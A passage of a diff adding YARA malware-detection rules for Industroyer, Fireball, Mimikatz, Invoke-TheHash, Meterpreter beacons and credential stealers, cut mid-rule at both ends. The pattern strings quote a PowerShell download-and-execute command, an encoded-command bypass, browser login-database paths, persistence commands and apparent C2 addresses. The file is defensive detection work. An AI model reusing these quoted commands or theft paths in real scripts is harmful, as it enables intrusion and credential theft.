+      $s8 = "current dns:%s" fullword ascii
+      $s9 = "%c%u|%u|%u|%u|%u|" fullword ascii
+      $s10 = "[-]send %d: " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 4 of them )
+}
+
+rule Waterbear_14_Jun17_RID2D66 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Operation Waterbear"
+      author = "Florian Roth"
+      reference = "https://goo.gl/L9g9eR"
+      date = "2017-06-23 10:30:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "00a1068645dbe982a9aa95e7b8202a588989cd37de2fa1b344abbc0102c27d05"
+      hash2 = "53330a80b3c4f74f3f10a8621dbef4cd2427723e8b98c5b7aed58229d0c292ba"
+      hash3 = "bdcb23a82ac4eb1bc9254d77d92b6f294d45501aaea678a3d21c8b188e31e68b"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "my.com/msg/util/sgthash" fullword ascii
+      $s2 = "C:\\recycled" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 8000KB and all of them )
+}
+
+rule PowerShell_ISESteroids_Obfuscation_RID347F : DEMO OBFUS SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects PowerShell ISESteroids obfuscation"
+      author = "Florian Roth"
+      reference = "https://twitter.com/danielhbohannon/status/877953970437844993"
+      date = "2017-06-23 15:33:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, OBFUS, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "/\\/===\\__" ascii
+      $x2 = "${__/\\/==" ascii
+      $x3 = "Catch { }" fullword ascii
+      $x4 = "\\_/=} ${_" ascii
+   condition: 
+      2 of them
+}
+
+rule BTC_Miner_lsass1_chrome_2_RID3068 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects a Bitcoin Miner"
+      author = "Florian Roth"
+      reference = "Internal Research - CN Actor"
+      date = "2017-06-22 12:38:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "048e9146387d6ff2ac055eb9ddfbfb9a7f70e95c7db9692e2214fa4bec3d5b2e"
+      hash2 = "c8db8469287d47ffdc74fe86ce0e9d6e51de67ba1df318573c9398742116a6e8"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
+      $x2 = "-O, --userpass=U:P    username:password pair for mining server" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 6000KB and 1 of them )
+}
+
+rule CN_Actor_RA_Tool_Ammyy_mscorsvw_RID3338 : CHINA DEMO EXE FILE MAL T1219 {
+   meta:
+      description = "Detects Ammyy remote access tool"
+      author = "Florian Roth"
+      reference = "Internal Research - CN Actor"
+      date = "2017-06-22 14:38:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
+      hash2 = "d9ec0a1be7cd218042c54bfbc12000662b85349a6b78731a09ed336e5d3cf0b4"
+      tags = "CHINA, DEMO, EXE, FILE, MAL, T1219"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Please enter password for accessing remote computer" fullword ascii
+      $s2 = "Die Zugriffsanforderung wurde vom Remotecomputer abgelehnt" fullword ascii
+      $s3 = "It will automatically be run the next time this computer is restart or you can start it manually" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
+}
+
+rule HTA_Embedded_RID2B57 : DEMO SUSP {
+   meta:
+      description = "Detects an embedded HTA file"
+      author = "Florian Roth"
+      reference = "https://twitter.com/msftmmpc/status/877396932758560768"
+      date = "2017-06-21 09:02:21"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
+      tags = "DEMO, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<hta:application windowstate=\"minimize\"/>" 
+   condition: 
+      $s1 and not $s1 in ( 0 .. 50000 )
+}
+
+rule HTA_with_WScript_Shell_RID2F8B : DEMO SCRIPT SUSP {
+   meta:
+      description = "Detects WScript Shell in HTA"
+      author = "Florian Roth"
+      reference = "https://twitter.com/msftmmpc/status/877396932758560768"
+      date = "2017-06-21 12:01:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
+      tags = "DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<hta:application windowstate=\"minimize\"/>" 
+      $s2 = "<script>var b=new ActiveXObject(\"WScript.Shell\");" ascii
+   condition: 
+      all of them
+}
+
+rule Mimikatz_Gen_Strings_RID2F19 : DEMO EXE FILE GEN HKTL S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Detects Mimikatz by using some special strings"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-06-19 11:42:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "058cc8b3e4e4055f3be460332a62eb4cbef41e3a7832aceb8119fd99fea771c4"
+      hash2 = "eefd4c038afa0e80cf6521c69644e286df08c0883f94245902383f50feac0f85"
+      hash3 = "f35b589c1cc1c98c4c4a5123fd217bdf0d987c00d2561992cbfb94bd75920159"
+      tags = "DEMO, EXE, FILE, GEN, HKTL, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[*] '%s' service already started" fullword wide
+      $s2 = "** Security Callback! **" fullword wide
+      $s3 = "Try to export a software CA to a crypto (virtual)hardware" fullword wide
+      $s4 = "enterpriseadmin" fullword wide
+      $s5 = "Ask debug privilege" fullword wide
+      $s6 = "Injected =)" fullword wide
+      $s7 = "** SAM ACCOUNT **" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
+}
+
+rule Invoke_SMBExec_RID2C43 : DEMO SCRIPT T1064 {
+   meta:
+      description = "Detects Invoke-WmiExec or Invoke-SmbExec"
+      author = "Florian Roth"
+      reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+      date = "2017-06-14 09:41:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
+      tags = "DEMO, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Invoke-SMBExec -Target" fullword ascii
+      $x2 = "$packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID" fullword ascii
+      $s1 = "Write-Output \"Command executed with service $SMB_service on $Target\"" fullword ascii
+      $s2 = "$packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00" fullword ascii
+      $s3 = "$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \\svcctl" fullword ascii
+   condition: 
+      ( filesize < 400KB and 1 of them )
+}
+
+rule Invoke_WMIExec_Gen_1_RID2E57 : DEMO GEN SCRIPT T1064 {
+   meta:
+      description = "Detects Invoke-WmiExec or Invoke-SmbExec"
+      author = "Florian Roth"
+      reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+      date = "2017-06-14 11:10:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "140c23514dbf8043b4f293c501c2f9046efcc1c08630621f651cfedb6eed8b97"
+      hash2 = "7565d376665e3cd07d859a5cf37c2332a14c08eb808cc5d187a7f0533dc69e07"
+      tags = "DEMO, GEN, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Invoke-WMIExec " ascii
+      $x2 = "$target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))" fullword ascii
+      $s1 = "Import-Module $PWD\\Invoke-TheHash.ps1" fullword ascii
+      $s2 = "Import-Module $PWD\\Invoke-SMBClient.ps1" fullword ascii
+      $s3 = "$target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList" fullword ascii
+      $x4 = "Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0" ascii
+   condition: 
+      1 of them
+}
+
+rule Invoke_SMBExec_Invoke_WMIExec_1_RID326F : DEMO SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+      date = "2017-06-14 14:05:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
+      hash2 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
+      tags = "DEMO, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$process_ID = $process_ID -replace \"-00-00\",\"\"" fullword ascii
+      $s2 = "Write-Output \"$Target did not respond\"" fullword ascii
+      $s3 = "[Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Invoke_WMIExec_Gen_RID2DC7 : DEMO GEN SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+      date = "2017-06-14 10:46:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "56c6012c36aa863663fe5536d8b7fe4c460565d456ce2277a883f10d78893c01"
+      hash2 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
+      hash3 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
+      tags = "DEMO, GEN, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)" fullword ascii
+      $s2 = "$client_challenge = [String](1..8 | ForEach-Object {\"{0:X2}\" -f (Get-Random -Minimum 1 -Maximum 255)})" fullword ascii
+      $s3 = "$NTLM_hash_bytes = $NTLM_hash_bytes.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Industroyer_Portscan_3_Output_RID32E4 : APT DEMO {
+   meta:
+      description = "Detects Industroyer related custom port scaner output file"
+      author = "Florian Roth"
+      reference = "https://goo.gl/x81cSy"
+      date = "2017-06-13 14:24:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WSA library load complite." fullword ascii
+      $s2 = "Connection refused" fullword ascii
+   condition: 
+      all of them
+}
+
+rule Industroyer_Malware_1_RID2F71 : APT DEMO EXE FILE MAL T1050 {
+   meta:
+      description = "Detects Industroyer related malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/x81cSy"
+      date = "2017-06-13 11:57:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910"
+      hash2 = "018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "haslo.exe" fullword ascii
+      $s2 = "SYSTEM\\CurrentControlSet\\Services\\%ls" fullword wide
+      $s3 = "SYS_BASCON.COM" fullword wide
+      $s4 = "*.pcmt" fullword wide
+      $s5 = "*.pcmi" fullword wide
+      $x1 = { 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73
+         00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61
+         00 67 00 65 00 50 00 61 00 74 00 68 00 00 00 43
+         00 3A 00 5C 00 00 00 44 00 3A 00 5C 00 00 00 45
+         00 3A 00 5C 00 00 00 } 
+      $x2 = "haslo.dat\x00Crash" 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 2 of them )
+}
+
+rule Industroyer_Malware_2_RID2F72 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Industroyer related malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/x81cSy"
+      date = "2017-06-13 11:57:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571"
+      hash2 = "37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4"
+      hash3 = "ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77"
+      hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "sc create %ls type= own start= auto error= ignore binpath= \"%ls\" displayname= \"%ls\"" fullword wide
+      $x2 = "10.15.1.69:3128" fullword wide
+      $s1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" fullword wide
+      $s2 = "/c sc stop %s" fullword wide
+      $s3 = "sc start %ls" fullword wide
+      $s4 = "93.115.27.57" fullword wide
+      $s5 = "5.39.218.152" fullword wide
+      $s6 = "tierexe" fullword wide
+      $s7 = "comsys" fullword wide
+      $s8 = "195.16.88.6" fullword wide
+      $s9 = "TieringService" fullword wide
+      $a1 = "TEMP\x00\x00DEF" fullword wide
+      $a2 = "TEMP\x00\x00DEF-C" fullword wide
+      $a3 = "TEMP\x00\x00DEF-WS" fullword wide
+      $a4 = "TEMP\x00\x00DEF-EP" fullword wide
+      $a5 = "TEMP\x00\x00DC-2-TEMP" fullword wide
+      $a6 = "TEMP\x00\x00DC-2" fullword wide
+      $a7 = "TEMP\x00\x00CES-McA-TEMP" fullword wide
+      $a8 = "TEMP\x00\x00SRV_WSUS" fullword wide
+      $a9 = "TEMP\x00\x00SRV_DC-2" fullword wide
+      $a10 = "TEMP\x00\x00SCE-WSUS01" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 3 of them or 1 of ( $a* ) ) or ( 5 of them )
+}
+
+rule Industroyer_Portscan_3_RID2FF4 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects Industroyer related custom port scaner"
+      author = "Florian Roth"
+      reference = "https://goo.gl/x81cSy"
+      date = "2017-06-13 12:19:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "!ZBfamily" fullword ascii
+      $s2 = ":g/outddomo;" fullword ascii
+      $s3 = "GHIJKLMNOTST" fullword ascii
+      $d1 = "Error params Arguments!!!" fullword wide
+      $d2 = "^(.+?.exe).*\\s+-ip\\s*=\\s*(.+)\\s+-ports\\s*=\\s*(.+)$" fullword wide
+      $d3 = "Exhample:App.exe -ip= 127.0.0.1-100," fullword wide
+      $d4 = "Error IP Range %ls - %ls" fullword wide
+      $d5 = "Can't closesocket." fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) or 2 of ( $d* ) )
+}
+
+rule Industroyer_Malware_4_RID2F74 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Industroyer related malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/x81cSy"
+      date = "2017-06-13 11:57:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "haslo.dat" fullword wide
+      $s2 = "defragsvc" fullword ascii
+      $a1 = { 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or $a1 )
+}
+
+rule Industroyer_Malware_5_RID2F75 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Industroyer related malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/x81cSy"
+      date = "2017-06-13 11:58:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "D2MultiCommService.exe" fullword ascii
+      $x2 = "Crash104.dll" fullword ascii
+      $x3 = "iec104.log" fullword ascii
+      $x4 = "IEC-104 client: ip=%s; port=%s; ASDU=%u " fullword ascii
+      $s1 = "Error while getaddrinfo executing: %d" fullword ascii
+      $s2 = "return info-Remote command" fullword ascii
+      $s3 = "Error killing process ..." fullword ascii
+      $s4 = "stop_comm_service_name" fullword ascii
+      $s5 = "*1* Data exchange: Send: %d (%s)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
+}
+
+rule CredentialStealer_Generic_Backdoor_RID347C : DEMO EXE FILE GEN MAL T1003 {
+   meta:
+      description = "Detects credential stealer byed on many strings that indicate password store access"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-06-07 15:32:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c"
+      tags = "DEMO, EXE, FILE, GEN, MAL, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GetOperaLoginData" fullword ascii
+      $s2 = "GetInternetExplorerCredentialsPasswords" fullword ascii
+      $s3 = "%s\\Opera Software\\Opera Stable\\Login Data" fullword ascii
+      $s4 = "select *  from moz_logins" fullword ascii
+      $s5 = "%s\\Google\\Chrome\\User Data\\Default\\Login Data" fullword ascii
+      $s6 = "Host.dll.Windows" fullword ascii
+      $s7 = "GetInternetExplorerVaultPasswords" fullword ascii
+      $s8 = "GetWindowsLiveMessengerPasswords" fullword ascii
+      $s9 = "%s\\Chromium\\User Data\\Default\\Login Data" fullword ascii
+      $s10 = "%s\\Opera\\Opera\\profile\\wand.dat" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and 4 of them )
+}
+
+rule Beacon_K5om_RID2B14 : APT COBALTSTRIKE DEMO EXE FILE HKTL METASPLOIT T1105 {
+   meta:
+      description = "Detects Meterpreter Beacon - file K5om.dll"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html"
+      date = "2017-06-07 08:51:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9"
+      tags = "APT, COBALTSTRIKE, DEMO, EXE, FILE, HKTL, METASPLOIT, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+      $x2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+      $x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
+      $s1 = "Could not open process token: %d (%u)" fullword ascii
+      $s2 = "0fd00b.dll" fullword ascii
+      $s3 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+      $s4 = "Could not connect to pipe (%s): %d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) )
+}
+
+rule Backdoor_Redosdru_Jun17_RID2FD1 : DEMO EXE FILE HIGHVOL MAL {
+   meta:
+      description = "Detects malware Redosdru - file systemHome.exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/OOB3mH"
+      date = "2017-06-04 12:13:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2020-11-30"
+      hash1 = "4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309"
+      tags = "DEMO, EXE, FILE, HIGHVOL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%s\\%d.gho" fullword ascii
+      $x2 = "%s\\nt%s.dll" fullword ascii
+      $x3 = "baijinUPdate" fullword ascii
+      $s1 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
+      $s2 = "serviceone" fullword ascii
+      $s3 = "\x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#f \x1f#" fullword ascii
+      $s4 = "servicetwo" fullword ascii
+      $s5 = "UpdateCrc" fullword ascii
+      $s6 = "\x1f#[ \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#" fullword ascii
+      $s7 = "nwsaPAgEnT" fullword ascii
+      $s8 = "%-24s %-15s 0x%x(%d) " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or 4 of them )
+}
+
+rule Fireball_de_svr_RID2D14 : APT DEMO EXE FILE MAL T1085 {
+   meta:
+      description = "Detects Fireball malware - file de_svr.exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4pTkGQ"
+      date = "2017-06-02 10:16:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f964a4b95d5c518fd56f06044af39a146d84b801d9472e022de4c929a5b8fdcc"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd.exe /c MD " fullword ascii
+      $s2 = "rundll32.exe \"%s\",%s" fullword wide
+      $s3 = "http://d12zpbetgs1pco.cloudfront.net/Weatherapi/shell" fullword wide
+      $s4 = "C:\\v3\\exe\\de_svr_inst.pdb" fullword ascii
+      $s5 = "Internet Connect Failed!" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them )
+}
+
+rule Fireball_lancer_RID2D06 : APT DEMO EXE FILE MAL T1085 {
+   meta:
+      description = "Detects Fireball malware - file lancer.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4pTkGQ"
+      date = "2017-06-02 10:14:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7d68386554e514f38f98f24e8056c11c0a227602ed179d54ed08f2251dc9ea93"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\instlsp\\Release\\Lancer.pdb" ascii
+      $x2 = "lanceruse.dat" fullword wide
+      $s1 = "Lancer.dll" fullword ascii
+      $s2 = "RunDll32.exe \"" fullword wide
+      $s3 = "Micr.dll" fullword wide
+      $s4 = "AG64.dll" fullword wide
+      $s5 = "\",Start" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
+}
+
+rule QQBrowser_RID2A97 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Not malware but suspicious browser - file QQBrowser_RID2A97.exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4pTkGQ"
+      date = "2017-06-02 07:03:21"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "adcf6b8aa633286cd3a2ce7c79befab207802dec0e705ed3c74c043dabfc604c"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "TerminateProcessWithoutDump" fullword ascii
+      $s2 = ".Downloader.dll" fullword wide
+      $s3 = "Software\\Chromium\\BrowserCrashDumpAttempts" fullword wide
+      $s4 = "QQBrowser_RID2A97_Broker.exe" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule chrome_elf_RID2B25 : APT DEMO EXE FILE LINUX MAL T1053 T1085 {
+   meta:
+      description = "Detects Fireball malware - file chrome_elf_RID2B25.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4pTkGQ"
+      date = "2017-06-02 08:54:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e4d4f6fbfbbbf3904ca45d296dc565138a17484c54aebbb00ba9d57f80dfe7e5"
+      tags = "APT, DEMO, EXE, FILE, LINUX, MAL, T1053, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x2 = "schtasks /Create /SC HOURLY /MO %d /ST 00:%02d:00 /TN \"%s\" /TR \"%s\" /RU \"SYSTEM\"" fullword wide
+      $s6 = "aHR0cDovL2R2Mm0xdXVtbnNndHUuY2xvdWRmcm9udC5uZXQvdjQvZ3RnLyVzP2FjdGlvbj12aXNpdC5jaGVsZi5pbnN0YWxs" fullword ascii
+      $s7 = "QueryInterface call failed for IExecAction: %x" fullword ascii
+      $s10 = "%s %s,Rundll32_Do %s" fullword wide
+      $s13 = "Failed to create an instance of ITaskService: %x" fullword ascii
+      $s16 = "Rundll32_Do" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
+}
+
+rule Fireball_regkey_RID2D18 : APT DEMO EXE FILE MAL T1113 {
+   meta:
+      description = "Detects Fireball malware - file regkey.exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4pTkGQ"
+      date = "2017-06-02 10:17:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "fff2818caa9040486a634896f329b8aebaec9121bdf9982841f0646763a1686b"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1113"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\WinMain\\Release\\WinMain.pdb" ascii
+      $s2 = "ScreenShot" fullword wide
+      $s3 = "WINMAIN" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule Fireball_archer_RID2D06 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Fireball malware - file archer.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4pTkGQ"
+      date = "2017-06-02 10:14:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\archer_lyl\\Release\\Archer_Input.pdb" ascii
+      $s1 = "Archer_Input.dll" fullword ascii
+      $s2 = "InstallArcherSvc" fullword ascii
+      $s3 = "%s_%08X" fullword wide
